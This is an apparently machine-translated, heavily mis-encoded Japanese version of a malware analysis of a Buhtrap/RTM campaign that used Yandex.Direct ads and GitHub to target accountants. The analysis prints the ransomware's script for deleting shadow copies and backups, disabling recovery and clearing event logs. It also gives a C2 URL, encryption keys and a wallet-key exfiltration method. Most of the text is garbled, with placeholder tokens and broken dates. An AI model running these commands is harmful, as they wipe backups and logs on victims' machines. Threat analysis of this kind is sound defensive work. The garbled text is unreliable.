äŒèšå£«ããµã€ããŒæ»æã®ã¿ãŒã²ããã«ããã«ã¯ãäŒèšå£«ããªã³ã©ã€ã³ã§æ€çŽ¢ããä»äºææžã䜿çšã§ããŸãã ããã¯ããããµã€ããŒã°ã«ãŒããéå»æ°ãæéã«ããã£ãŠæ¢ç¥ã®ããã¯ãã¢ãé
åžããŠããããšãšã»ãŒåãã§ãã
Buhtrap ã®ãœãŒã¹ã³ãŒãã¯éå»ã«ãªã³ã©ã€ã³ã«æµåºããŠããã誰ã§ã䜿çšã§ããããã«ãªã£ãŠããŸãã RTM ã³ãŒãã®å©çšå¯èœæ§ã«é¢ããæ å ±ã¯ãããŸããã
ãã®æçš¿ã§ã¯ãæ»æè ãã©ã®ããã«ã㊠Yandex.Direct ã䜿çšããŠãã«ãŠã§ã¢ãé åžããGitHub ã§ãã¹ããããã«ã€ããŠèª¬æããŸãã ãã®æçš¿ã¯ããã«ãŠã§ã¢ã®æè¡åæã§çµãããŸãã
Buhtrap ãš RTM ãããžãã¹ãåé
è延ã®ã¡ã«ããºã ãšè¢«å®³è
被害è ã«é ä¿¡ãããããŸããŸãªãã€ããŒãã¯ãå ±éã®äŒæã¡ã«ããºã ãå ±æããŠããŸãã æ»æè ã«ãã£ãŠäœæããããã¹ãŠã®æªæã®ãããã¡ã€ã«ã¯ãXNUMX ã€ã®ç°ãªã GitHub ãªããžããªã«é 眮ãããŸããã
éåžžããªããžããªã«ã¯ãé »ç¹ã«å€æŽããããããŠã³ããŒãå¯èœãªæªæã®ãããã¡ã€ã«ã 24 ã€å«ãŸããŠããŸããã GitHubã§ã¯ãªããžããªã®å€æŽå±¥æŽãé²èŠ§ã§ãããããäžå®æéã«ã©ã®ãããªãã«ãŠã§ã¢ãé åžãããã®ããç¥ãããšãã§ããŸãã 被害è ã«æªæã®ãããã¡ã€ã«ãããŠã³ããŒããããããã«ãäžã®å³ã«ç€ºã Web ãµã€ãblanki-shabloniXNUMX[.]ruã䜿çšãããŸããã
ãµã€ãã®ãã¶ã€ã³ãšæªæã®ãããã¡ã€ã«ã®ååã¯ãã¹ãŠããã©ãŒã ããã³ãã¬ãŒããå¥çŽæžããµã³ãã«ãªã©ã®åäžã®æŠå¿µã«åŸã£ãŠããŸããBuhtrap ãš RTM ãœãããŠã§ã¢ãéå»ã«äŒèšå£«ã«å¯Ÿããæ»æã«ãã§ã«äœ¿çšãããŠããããšãèæ ®ãããšãæ°ãããã£ã³ããŒã³ã®æŠç¥ã¯åãã§ãã å¯äžã®åé¡ã¯ã被害è ãã©ã®ããã«ããŠæ»æè ã®ãµã€ãã«ãã©ãçããã®ããšããããšã§ãã
ææ
ãã®ãµã€ãã«ãã©ãçããæœåšçãªè¢«å®³è ã®ãã¡å°ãªããšãæ°äººã¯ãæªæã®ããåºåã«æ¹ãããŠããŸããã 以äžã¯ URL ã®äŸã§ãã
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ÑкаÑаÑÑ Ð±Ð»Ð°ÐœÐº ÑÑеÑа&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
ãªã³ã¯ãããããããã«ããããŒã¯æ£èŠã®äŒèšãã©ãŒã©ã bb.f2[.]kz ã«æçš¿ãããŸããã ãããŒã¯ããŸããŸãªãµã€ãã«è¡šç€ºããããã¹ãŠåããã£ã³ããŒã³ ID (blanki_rsya) ãæã¡ããã®ã»ãšãã©ãäŒèšãŸãã¯æ³åæ¯æŽãµãŒãã¹ã«é¢é£ããŠããããšã«æ³šæããããšãéèŠã§ãã URL ã¯ãæœåšçãªè¢«å®³è ããè«æ±æžãã©ãŒã ã®ããŠã³ããŒãããšãããªã¯ãšã¹ãã䜿çšããããšã瀺ããŠãããããã¯æšçåæ»æã®ä»®èª¬ãè£ä»ããŠããŸãã 以äžã¯ããããŒã衚瀺ããããµã€ããšã察å¿ããæ€çŽ¢ã¯ãšãªã§ãã
- è«æ±æžãã©ãŒã ãããŠã³ããŒã â bb.f2[.]kz
- ãµã³ãã«å¥çŽæž - Ipopen[.]ru
- ã¢ããªã±ãŒã·ã§ã³ã®èŠæ ãµã³ãã« - 77metrov[.]ru
- å¥çŽæž - 空çœ-dogovor-kupli-prodazhi[.]ru
- æ³å»·åé¡æžã®ãµã³ãã« - zen.yandex[.]ru
- èŠæ ã®ãµã³ãã« - yurday[.]ru
- ãµã³ãã«å¥çŽãã©ãŒã â Regforum[.]ru
- å¥çŽãã©ãŒã âAssistentus[.]ru
- ã¢ããŒãå¥çŽæžã®ãµã³ãã« â napravah[.]com
- æ³çå¥çŽæžã®ãµã³ãã« - avito[.]ru
blanki-shabloni24[.]ru ãµã€ãã¯ãç°¡åãªèŠèŠçè©äŸ¡ã«åæ Œããããã«æ§æãããŠããå¯èœæ§ããããŸãã éåžžãGitHub ãžã®ãªã³ã¯ãå«ããããã§ãã·ã§ãã«ãªãµã€ããæãåºåã¯ãæããã«æªããã®ãšã¯æããŸããã ããã«ãæ»æè ã¯ããã£ã³ããŒã³æéäžãšæãããéãããæéã®ã¿ãæªæã®ãããã¡ã€ã«ããªããžããªã«ã¢ããããŒãããŸããã ã»ãšãã©ã®å ŽåãGitHub ãªããžããªã«ã¯ç©ºã® zip ã¢ãŒã«ã€ããŸãã¯ç©ºã® EXE ãã¡ã€ã«ãå«ãŸããŠããŸããã ãããã£ãŠãæ»æè ã¯ãç¹å®ã®æ€çŽ¢ã¯ãšãªã«å¿çããŠèšªããäŒèšå£«ã蚪åããå¯èœæ§ãæãé«ããµã€ãã«ãYandex.Direct ãéããŠåºåãé åžããå¯èœæ§ããããŸãã
次ã«ããã®æ¹æ³ã§åæ£ãããããŸããŸãªãã€ããŒããèŠãŠã¿ãŸãããã
ãã€ããŒãåæ
é åžå¹Žè¡š
ãã®æªæã®ãããã£ã³ããŒã³ã¯ 2018 幎 XNUMX ææ«ã«å§ãŸãããã®èšäºã®å·çæç¹ã§ã¯æŽ»åäžã§ãã ãªããžããªå šäœã GitHub ã§å ¬éãããŠãããããXNUMX ã€ã®ç°ãªããã«ãŠã§ã¢ ãã¡ããªã®é åžã®æ£ç¢ºãªã¿ã€ã ã©ã€ã³ããŸãšããŸãã (äžå³ãåç §)ã git å±¥æŽãšæ¯èŒããããã«ãESET ãã¬ã¡ããªã«ãã£ãŠæž¬å®ããããã㌠ãªã³ã¯ããã€æ€åºããããã瀺ãè¡ãè¿œå ããŸããã ã芧ã®ãšããããã㯠GitHub äžã®ãã€ããŒãã®å¯çšæ§ãšããçžé¢ããŠããŸãã XNUMX ææ«ã®ççŸã¯ããªããžããªãå®å šã«ååŸããåã« GitHub ããåé€ããããããå€æŽå±¥æŽã®äžéšãååšããªãã£ããšããäºå®ã«ãã£ãŠèª¬æã§ããŸãã
å³ 1. ãã«ãŠã§ã¢é
åžã®å¹Žè¡šã
ã³ãŒã眲å蚌ææž
ãã£ã³ããŒã³ã§ã¯è€æ°ã®èšŒææžã䜿çšãããŸããã äžéšã¯è€æ°ã®ãã«ãŠã§ã¢ ãã¡ããªã«ãã£ãŠçœ²åãããŠãããããã¯ããã«ãç°ãªããµã³ãã«ãåããã£ã³ããŒã³ã«å±ããŠããããšã瀺ããŠããŸãã ç§å¯ããŒãå©çšå¯èœã§ããã«ããããããããªãã¬ãŒã¿ãŒã¯ãã€ããªã«äœç³»çã«çœ²åããããã¹ãŠã®ãµã³ãã«ã«ããŒã䜿çšããŸããã§ããã 2019 幎 XNUMX æäžæ¬ãæ»æè ã¯ç§å¯ããŒãæã£ãŠããªã Google ææã®èšŒææžã䜿çšããŠç¡å¹ãªçœ²åãäœæãå§ããŸããã
ãã£ã³ããŒã³ã«é¢ä¿ãããã¹ãŠã®èšŒææžãšããããã眲åãããã«ãŠã§ã¢ ãã¡ããªã以äžã®è¡šã«ç€ºããŸãã
ãŸãããããã®ã³ãŒã眲å蚌ææžã䜿çšããŠãä»ã®ãã«ãŠã§ã¢ ãã¡ããªãšã®ãªã³ã¯ã確ç«ããŸããã ã»ãšãã©ã®èšŒææžã«ã€ããŠã¯ãGitHub ãªããžããªãéããŠé
åžãããŠããªããµã³ãã«ã¯èŠã€ãããŸããã§ããã ãã ããTOVãMARIYAã蚌ææžã¯ãããããããã«å±ãããã«ãŠã§ã¢ã®çœ²åã«äœ¿çšãããŸããã
Win32/Filecoder.Buhtrap
ç§ãã¡ã®æ³šæãåŒããæåã®ã³ã³ããŒãã³ãã¯ãæ°ããçºèŠããã Win32/Filecoder.Buhtrap ã§ããã ããã¯ãããã±ãŒãžåãããããšããã Delphi ãã€ã㪠ãã¡ã€ã«ã§ãã äž»ã«2019幎XNUMXæïœXNUMXæã«é ä¿¡ãããŸããã ã©ã³ãµã ãŠã§ã¢ ããã°ã©ã ã«ãµããããåäœãããããŒã«ã« ãã©ã€ããšãããã¯ãŒã¯ ãã©ã«ããŒãæ€çŽ¢ããæ€åºããããã¡ã€ã«ãæå·åããŸãã æå·åããŒãéä¿¡ããããã«ãµãŒããŒã«æ¥ç¶ããªããããã€ã³ã¿ãŒãããæ¥ç¶ã䟵害ãããå¿ èŠã¯ãããŸããã 代ããã«ã身代éã¡ãã»ãŒãžã®æ«å°Ÿã«ãããŒã¯ã³ããè¿œå ããé»åã¡ãŒã«ãŸã㯠Bitmessage ã䜿çšããŠãªãã¬ãŒã¿ãŒã«é£çµ¡ããããšãææ¡ããŸãã
ã§ããã ãå€ãã®æ©å¯ãªãœãŒã¹ãæå·åããããã«ãFilecoder.Buhtrap ã¯ãæå·åã劚ããå¯èœæ§ã®ãã貎éãªæ å ±ãå«ããã¡ã€ã« ãã³ãã©ãŒãéããŠããå¯èœæ§ã®ããäž»èŠãªãœãããŠã§ã¢ãã·ã£ããããŠã³ããããã«èšèšãããã¹ã¬ãããå®è¡ããŸãã 察象ãšãªãããã»ã¹ã¯äž»ã«ããŒã¿ããŒã¹ç®¡çã·ã¹ãã ïŒDBMSïŒã§ãã ããã«ãFilecoder.Buhtrap ã¯ãã° ãã¡ã€ã«ãšããã¯ã¢ãããåé€ããŠãããŒã¿ã®å埩ãå°é£ã«ããŸãã ãããè¡ãã«ã¯ã以äžã®ããã ã¹ã¯ãªãããå®è¡ããŸãã
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap ã¯ãWeb ãµã€ã蚪åè ã«é¢ããæ å ±ãåéããããã«èšèšãããæ£èŠã®ãªã³ã©ã€ã³ IP Logger ãµãŒãã¹ã䜿çšããŸãã ããã¯ãã©ã³ãµã ãŠã§ã¢ã®è¢«å®³è ã远跡ããããšãç®çãšããŠãããã³ãã³ã ã©ã€ã³ã責任ãè² ããŸãã
mshta.exe "javascript:document.write('');"
æå·å察象ã®ãã¡ã€ã«ã¯ãXNUMX ã€ã®é€å€ãªã¹ãã«äžèŽããªãå Žåã«éžæãããŸãã ãŸããæ¡åŒµåã .comã.cmdã.cplã.dllã.exeã.htaã.lnkã.mscã.msiã.mspã.pifã.scrã.sys ã®ãã¡ã€ã«ã¯æå·åãããŸããã ãã³ãŠã¢ãªã 次ã«ããã«ãã¹ã«ä»¥äžã®ãªã¹ãã®ãã£ã¬ã¯ããªæååãå«ãŸãããã¹ãŠã®ãã¡ã€ã«ãé€å€ãããŸãã
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
第äžã«ãç¹å®ã®ãã¡ã€ã«åãæå·åããé€å€ãããŸãããã®äžã«ã¯èº«ä»£éã¡ãã»ãŒãžã®ãã¡ã€ã«åãå«ãŸããŸãã ãªã¹ãã以äžã«ç€ºããŸãã æããã«ããããã®äŸå€ã¯ãã¹ãŠããã·ã³ã®çšŒåãç¶æããããšãç®çãšããŠããŸãããè·¯äžèµ°è¡å¯èœæ§ã¯æå°éã«æããããŠããŸãã
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
ãã¡ã€ã«æå·åæ¹åŒ
ãã«ãŠã§ã¢ãå®è¡ããããšã512 ãããã® RSA ã㌠ãã¢ãçæãããŸãã 次ã«ãç§å¯ææ° (d) ãšæ³ (n) ã¯ãããŒãã³ãŒãããã 2048 ãããã®å ¬éã㌠(å ¬éææ°ãšæ³) ã§æå·åãããzlib ããã¯ãããbase64 ã§ãšã³ã³ãŒããããŸãã ãããæ åœããã³ãŒããå³ 2 ã«ç€ºããŸãã
å³ 2. 512 ããã RSA ã㌠ãã¢çæããã»ã¹ã® Hex-Rays éã³ã³ãã€ã«ã®çµæã
以äžã¯ãçæãããç§å¯ã㌠(身代éã¡ãã»ãŒãžã«æ·»ä»ãããããŒã¯ã³) ãå«ããã¬ãŒã³ ããã¹ãã®äŸã§ãã
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
æ»æè ã®å ¬ééµã¯ä»¥äžã«ç€ºãããŠããŸãã
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
ãã¡ã€ã«ã¯ã128 ããã ããŒã䜿çšãã AES-256-CBC ã䜿çšããŠæå·åãããŸãã æå·åããããã¡ã€ã«ããšã«ãæ°ããããŒãšæ°ããåæåãã¯ãã«ãçæãããŸãã éµæ
å ±ã¯æå·åããããã¡ã€ã«ã®æ«å°Ÿã«ä»å ãããŸãã æå·åããããã¡ã€ã«ã®åœ¢åŒãèããŠã¿ãŸãããã
æå·åããããã¡ã€ã«ã«ã¯æ¬¡ã®ããããŒããããŸãã
VEGA ããžãã¯å€ãè¿œå ããããœãŒã¹ ãã¡ã€ã« ããŒã¿ã¯ãæåã® 0x5000 ãã€ããŸã§æå·åãããŸãã ãã¹ãŠã®åŸ©å·åæ
å ±ã¯ã次ã®æ§é ã®ãã¡ã€ã«ã«æ·»ä»ãããŸãã
- ãã¡ã€ã« ãµã€ãº ããŒã«ãŒã«ã¯ããã¡ã€ã«ã®ãµã€ãºã 0x5000 ãã€ããã倧ãããã©ããã瀺ãããŒã¯ãå«ãŸããŠããŸã
â AES ã㌠BLOB = ZlibCompress(RSAEncrypt(AES ã㌠+ IVãçæããã RSA ã㌠ãã¢ã®å
¬éããŒ))
- RSA ã㌠BLOB = ZlibCompress(RSAEncrypt(çæããã RSA ç§å¯ããŒãããŒãã³ãŒãã£ã³ã°ããã RSA å
¬éããŒ))
Win32/ã¯ãªãããã³ã«ãŒ
Win32/ClipBankerã¯ã2018幎4æäžæ¬ããXNUMXæäžæ¬ã«ãããŠæç¶çã«é åžãããã³ã³ããŒãã³ãã§ãã ãã®åœ¹å²ã¯ã¯ãªããããŒãã®å 容ãç£èŠããæå·é貚ãŠã©ã¬ããã®ã¢ãã¬ã¹ãæ¢ãããšã§ãã ã¿ãŒã²ããã®ãŠã©ã¬ããã®ã¢ãã¬ã¹ãç¹å®ãããšãClipBanker ã¯ããããªãã¬ãŒã¿ãŒã«å±ãããšæãããã¢ãã¬ã¹ã«çœ®ãæããŸãã ç§ãã¡ã調ã¹ããµã³ãã«ã¯ããã¯ã¹åãé£èªåããããŠããŸããã§ããã åäœããã¹ã¯ããããã«äœ¿çšãããå¯äžã®ã¡ã«ããºã ã¯æååæå·åã§ãã ãªãã¬ãŒã¿ãŒã®ãŠã©ã¬ããã®ã¢ãã¬ã¹ã¯ RCXNUMX ã䜿çšããŠæå·åãããŸãã 察象ãšãªãä»®æ³é貚ã¯ãããã³ã€ã³ããããã³ã€ã³ãã£ãã·ã¥ãããŒãžã³ã€ã³ãã€ãŒãµãªã¢ã ããªããã«ã§ãã
ãã«ãŠã§ã¢ãæ»æè ã®ãããã³ã€ã³ ãŠã©ã¬ããã«æ¡æ£ããŠããæéäžã«ãå°éã VTS ã«éä¿¡ãããããããã£ã³ããŒã³ã®æåã«ã¯çåãçããŠããŸãã ããã«ããããã®ååŒã ClipBanker ã«é¢é£ããŠããããšã瀺åãã蚌æ ã¯ãŸã£ãããããŸããã
Win32/RTM
Win32/RTM ã³ã³ããŒãã³ãã¯ã2019 幎 2017 æåæ¬ã«æ°æ¥éé
åžãããŸããã RTM ã¯ããªã¢ãŒã ãã³ãã³ã° ã·ã¹ãã ãç®çãšãã Delphi ã§æžãããããã€ã®æšéŠ¬ãã³ã«ãŒã§ãã XNUMX 幎ã«ãESET ã®ç 究è
ã¯æ¬¡ã®è«æãçºè¡šããŸããã
ããã©ããããŒããŒ
ãã°ããã®éã以åã® Buhtrap ããŒã«ãšã¯äŒŒãŠããªãããŠã³ããŒããŒã GitHub ã§å©çšå¯èœã§ããã 圌ã¯æ¯ãè¿ã£ãŠ https://94.100.18[.]67/RSS.php?<some_id>
次ã®ã¹ããŒãžãååŸãããããã¡ã¢ãªã«çŽæ¥ããŒãããŸãã 第 XNUMX 段éã®ã³ãŒãã® XNUMX ã€ã®åäœãåºå¥ã§ããŸãã æåã® URL ã§ã¯ãRSS.php ã Buhtrap ããã¯ãã¢ãçŽæ¥æž¡ããŸããããã®ããã¯ãã¢ã¯ããœãŒã¹ ã³ãŒããæŒæŽ©ããåŸã«å©çšå¯èœã«ãªã£ããã®ãšéåžžã«ãã䌌ãŠããŸãã
èå³æ·±ãããšã«ãBuhtrap ããã¯ãã¢ã䜿çšãããã£ã³ããŒã³ãããã€ã確èªãããŠããããããã¯ç°ãªããªãã¬ãŒã¿ãŒã«ãã£ãŠå®è¡ãããŠãããšãããŠããŸãã ãã®å Žåã®äž»ãªéãã¯ãããã¯ãã¢ãã¡ã¢ãªã«çŽæ¥ããŒããããå
ã»ã©èª¬æãã DLL å±éããã»ã¹ã§éåžžã®ã¹ããŒã ã䜿çšããªãããšã§ãã
XNUMX çªç®ã®ããè€éãªåäœã¯ãRSS.php URL ãå¥ã®ããŒããŒã«æž¡ãããããšã§ããã åçã€ã³ããŒã ããŒãã«ã®åæ§ç¯ãªã©ãããã€ãã®é£èªåãå®è£
ãããŸããã ããŒãããŒããŒã®ç®çã¯ãC&C ãµãŒããŒã«æ¥ç¶ããããšã§ãã
ã¢ã³ããã€ã/ã¹ãã€.ãã³ã«ãŒ
èå³æ·±ãããšã«ãAndroid çšã®ã³ã³ããŒãã³ãã GitHub ãªããžããªã§èŠã€ãããŸããã 圌ãæ¬åºã«ããã®ã¯ 1 幎 2018 æ XNUMX æ¥ã® XNUMX æ¥ã ãã§ããã GitHub ã«æçš¿ãããããšãé€ãã°ãESET ãã¬ã¡ããªãŒã§ã¯ããã®ãã«ãŠã§ã¢ãé åžããã蚌æ ã¯èŠã€ãããŸããã§ããã
ã³ã³ããŒãã³ã㯠Android ã¢ããªã±ãŒã·ã§ã³ ããã±ãŒãž (APK) ãšããŠãã¹ããããŸããã ããªãé£èªåãããŠããŸãã æªæã®ããåäœã¯ãAPK å ã«ããæå·åããã JAR ã«é ãããŠããŸãã 次ã®ããŒã䜿çšã㊠RC4 ã§æå·åãããŸãã
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
æååã®æå·åã«ã¯åãããŒãšã¢ã«ãŽãªãºã ã䜿çšãããŸãã JAR ã¯æ¬¡ã®å Žæã«ãããŸã APK_ROOT + image/files
ã ãã¡ã€ã«ã®æåã® 4 ãã€ãã«ã¯æå·åããã JAR ã®é·ããå«ãŸããŠãããé·ããã£ãŒã«ãã®çŽåŸããå§ãŸããŸãã
ãã¡ã€ã«ã埩å·åãããšãããããã Anubis ã§ããããšãããããŸããã
- ãã€ã¯é²é³
- ã¹ã¯ãªãŒã³ã·ã§ãããæ®ã
- GPS 座æšãååŸãã
- ããŒãã¬ãŒ
- ããã€ã¹ããŒã¿ã®æå·åãšèº«ä»£éèŠæ±
- ã¹ãã è¡çº
èå³æ·±ãããšã«ãéè¡å®¶ã¯å¥ã® C&C ãµãŒããŒãååŸããããã®ããã¯ã¢ããéä¿¡ãã£ãã«ãšã㊠Twitter ã䜿çšããŸããã ç§ãã¡ãåæãããµã³ãã«ã§ã¯ @JonesTrader ã¢ã«ãŠã³ãã䜿çšãããŠããŸããããåææç¹ã§ã¯ãã§ã«ãããã¯ãããŠããŸããã
ãã³ã«ãŒã«ã¯ãAndroid ããã€ã¹äžã®ã¿ãŒã²ãã ã¢ããªã±ãŒã·ã§ã³ã®ãªã¹ããå«ãŸããŠããŸãã ããã¯ããœãã©ã¹ã®èª¿æ»ã§åŸããããªã¹ããããé·ãã§ãã ãã®ãªã¹ãã«ã¯ãå€ãã®éè¡ã¢ããªã±ãŒã·ã§ã³ãAmazon ã eBay ãªã©ã®ãªã³ã©ã€ã³ ã·ã§ããã³ã° ããã°ã©ã ãæå·é貚ãµãŒãã¹ãå«ãŸããŠããŸãã
MSIL/ã¯ãªãããã³ã«ãŒ.IH
ãã®ãã£ã³ããŒã³ã®äžç°ãšããŠé åžãããæåŸã®ã³ã³ããŒãã³ãã¯ã2019 幎 1.0.0 æã«ç»å Žãã .NET Windows å®è¡å¯èœãã¡ã€ã«ã§ããã 調æ»ããããŒãžã§ã³ã®ã»ãšãã©ã¯ãConfuserEx vXNUMX ã«ããã±ãŒãžåãããŠããŸããã ClipBanker ãšåæ§ã«ããã®ã³ã³ããŒãã³ãã¯ã¯ãªããããŒãã䜿çšããŸãã 圌ã®ç®æšã¯ãå¹ åºãä»®æ³é貚㚠Steam ã§ã®ãªãã¡ãŒã§ãã ããã«ãIP Logger ãµãŒãã¹ã䜿çšããŠããããã³ã€ã³ç§å¯ WIF ããŒãçã¿ãŸãã
ä¿è·ã¡ã«ããºã
ConfuserEx ã¯ããããã°ããã³ããæ¹ãããé²æ¢ãããšããå©ç¹ã«å ããŠããŠã€ã«ã¹å¯Ÿç補åãä»®æ³ãã·ã³ãæ€åºããæ©èœãåããŠããŸãã
ä»®æ³ãã·ã³ã§å®è¡ãããŠããããšã確èªããããã«ããã«ãŠã§ã¢ã¯çµã¿èŸŒã¿ã® Windows WMI ã³ãã³ã ã©ã€ã³ (WMIC) ã䜿çšã㊠BIOS æ å ±ãèŠæ±ããŸããã€ãŸãã次ã®ãšããã§ãã
wmic bios
次ã«ãããã°ã©ã ã¯ã³ãã³ãåºåã解æããVBOXãVirtualBoxãXENãqemuãbochsãVM ã®ããŒã¯ãŒããæ€çŽ¢ããŸãã
ãŠã€ã«ã¹å¯Ÿç補åãæ€åºããããã«ããã«ãŠã§ã¢ã¯ Windows Management Instrumentation (WMI) èŠæ±ã Windows ã»ãã¥ãªã㣠ã»ã³ã¿ãŒã«éä¿¡ããŸãã ManagementObjectSearcher
以äžã«ç€ºããã㪠API ã§ãã Base64 ãããã³ãŒãããåŸã®åŒã³åºãã¯æ¬¡ã®ããã«ãªããŸãã
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
å³ 3. ãŠã€ã«ã¹å¯Ÿç補åãç¹å®ããããã»ã¹ã
ããã«ããã«ãŠã§ã¢ã¯æ¬¡ã®ããšããã§ãã¯ããŸãã
æç¶æ§
ç§ãã¡ã調æ»ãããã«ãŠã§ã¢ã®ããŒãžã§ã³ã¯èªåèªèº«ãã³ããŒããŸã %APPDATA%googleupdater.exe
ãããŠãGoogle ãã£ã¬ã¯ããªã«ãhiddenãå±æ§ãèšå®ããŸãã ãããã圌女ã¯å€ãå€æŽããŸã SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell
Windows ã¬ãžã¹ããªã«ãã¹ãè¿œå ããŸã updater.exe
ã ãã®ããã«ããŠããŠãŒã¶ãŒããã°ã€ã³ãããã³ã«ãã«ãŠã§ã¢ãå®è¡ãããŸãã
æªæã®ããè¡çº
ClipBanker ãšåæ§ã«ããã®ãã«ãŠã§ã¢ã¯ã¯ãªããããŒãã®å 容ãç£èŠããŠæå·é貚ãŠã©ã¬ããã®ã¢ãã¬ã¹ãæ¢ããèŠã€ãã£ãå Žåã¯ãªãã¬ãŒã¿ãŒã®ã¢ãã¬ã¹ã® XNUMX ã€ã«çœ®ãæããŸãã 以äžã¯ãã³ãŒãå ã§èŠã€ãã£ãå 容ã«åºã¥ããã¿ãŒã²ãã ã¢ãã¬ã¹ã®ãªã¹ãã§ãã
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
ã¢ãã¬ã¹ã®çš®é¡ããšã«ã察å¿ããæ£èŠè¡šçŸããããŸãã ãããã¡å ã®å®çŸ©ã«äœ¿çšãããŠããæ£èŠè¡šçŸãããããããã«ãSTEAM_URL å€ã¯ Steam ã·ã¹ãã ãæ»æããããã«äœ¿çšãããŸãã
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
æŒæŽ©ãã£ãã«
ãã®ãã«ãŠã§ã¢ã¯ããããã¡å ã®ã¢ãã¬ã¹ã眮ãæããã ãã§ãªãããããã³ã€ã³ããããã³ã€ã³ ã³ã¢ãããã³ãšã¬ã¯ãã©ã ãããã³ã€ã³ ãŠã©ã¬ããã®ç§å¯ WIF ããŒãã¿ãŒã²ããã«ããŸãã ãã®ããã°ã©ã ã¯ãWIF ç§å¯ããŒãååŸããããã®æµåºãã£ãã«ãšã㊠plogger.org ã䜿çšããŸãã ãããè¡ãã«ã¯ã以äžã«ç€ºãããã«ããªãã¬ãŒã¿ãŒã¯ç§å¯éµããŒã¿ã User-Agent HTTP ããããŒã«è¿œå ããŸãã
å³ 4. åºåããŒã¿ãå«ã IP Logger ã³ã³ãœãŒã«ã
ãªãã¬ãŒã¿ãŒã¯ãŠã©ã¬ããã®æµåºã« iplogger.org ã䜿çšããŸããã§ããã ãããããã£ãŒã«ãã® 255 æåå¶éã«ãããå¥ã®æ¹æ³ã«é Œã£ãã®ã§ãããã User-Agent
IP Logger Web ã€ã³ã¿ãŒãã§ã€ã¹ã«è¡šç€ºãããŸãã ç§ãã¡ã調æ»ãããµã³ãã«ã§ã¯ãââä»ã®åºåãµãŒããŒã¯ç°å¢å€æ°ã«ä¿åãããŠããŸããã DiscordWebHook
ã é©ãã¹ãããšã«ããã®ç°å¢å€æ°ã¯ã³ãŒãå
ã®ã©ãã«ãå²ãåœãŠãããŠããŸããã ããã¯ããã«ãŠã§ã¢ããŸã éçºäžã§ãããå€æ°ããªãã¬ãŒã¿ãŒã®ãã¹ã ãã·ã³ã«å²ãåœãŠãããŠããããšã瀺åããŠããŸãã
